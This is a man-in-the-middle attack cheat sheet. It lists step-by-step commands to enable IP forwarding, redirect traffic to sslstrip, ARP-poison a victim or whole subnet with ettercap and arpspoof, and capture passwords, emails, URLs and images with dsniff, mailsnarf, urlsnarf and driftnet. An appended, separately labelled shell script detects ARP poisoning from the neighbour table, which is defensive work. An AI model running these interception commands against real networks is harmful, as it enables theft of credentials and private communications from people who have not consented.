MiTM

1. Configure ip forwarding on attacker host

echo "1" > /proc/sys/net/ipv4/ip_forward

2. Redirection of http traffic to sslstrip
2a. iptables -t nat -A PREROUTING -i eth0 -p tcp --destination-port 80 -j REDIRECT --to-port 8000
2b. iptables-save

3. SSLStrip
sslstrip -k -l 8000 -w encrypted.txt

4. Ettercap
ettercap -TqM arp:remote <victim_ip> <gateway_ip>

5. Arpspoof
5a. Single host > arpspoof -i eth0 -t <victim_ip> <gateway_ip>
5b. Whole net > arpspoof -i eth0 <gateway_ip>

6. Urlsnarf – capture http
urlsnarf -i eth0

7. Driftnet – capture images
driftnet -i eth0

8. Dsniff – capture passwords
dsniff -i eth0 -w plaintext.txt

9. Mailsnarf – capture emails
mailsnarf -i eth0
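
Detection side of the ARP poisoning steps above (ettercap arp:remote, arpspoof), as an added example that is not part of the original cheat sheet: on a poisoned host the gateway IP resolves to the same MAC as another IP on the segment. The function names and the sample table are constructed for illustration; input is assumed to be in `ip neigh show` format (Linux, iproute2).

```shell
#!/bin/sh
# Added example: flag MAC addresses that answer for more than one IPv4 address
# in the neighbour (ARP) table, the pattern a poisoned cache shows.

# find_shared_macs: reads `ip neigh show` style lines on stdin and prints
# "MAC ip1,ip2,..." for every MAC claimed by two or more IPv4 addresses.
find_shared_macs() {
    awk '
        {
            # Entries without a resolved lladdr (FAILED/INCOMPLETE) are skipped.
            mac = ""
            for (i = 1; i < NF; i++) if ($i == "lladdr") mac = tolower($(i + 1))
            if (mac == "" || $1 !~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) next
            if ((mac, $1) in seen) next
            seen[mac, $1] = 1
            if (mac in ips) ips[mac] = ips[mac] "," $1
            else ips[mac] = $1
            count[mac]++
        }
        END { for (m in count) if (count[m] > 1) print m, ips[m] }
    ' | sort
}

# gateway_is_shared: returns 0 (alert) when the gateway IP given as $1 shares
# its MAC with another IP in the table read from stdin, 1 otherwise.
gateway_is_shared() {
    find_shared_macs | awk -v gw="$1" '
        { n = split($2, a, ","); for (i = 1; i <= n; i++) if (a[i] == gw) hit = 1 }
        END { exit (hit ? 0 : 1) }
    '
}

# Constructed sample: 192.168.1.1 (gateway) and 192.168.1.66 share one MAC.
SAMPLE_NEIGH='192.168.1.1 dev eth0 lladdr 00:11:22:33:44:66 REACHABLE
192.168.1.20 dev eth0 lladdr 00:11:22:33:44:20 STALE
192.168.1.66 dev eth0 lladdr 00:11:22:33:44:66 REACHABLE
192.168.1.30 dev eth0  FAILED'

# Live use: ip -4 neigh show | find_shared_macs
#           ip -4 neigh show | gateway_is_shared <gateway_ip> && echo "ALERT"
```

Proxy ARP, VRRP/HSRP virtual addresses and multi-homed hosts also share a MAC across IPs, so treat a hit as a lead to confirm against the gateway's known hardware address.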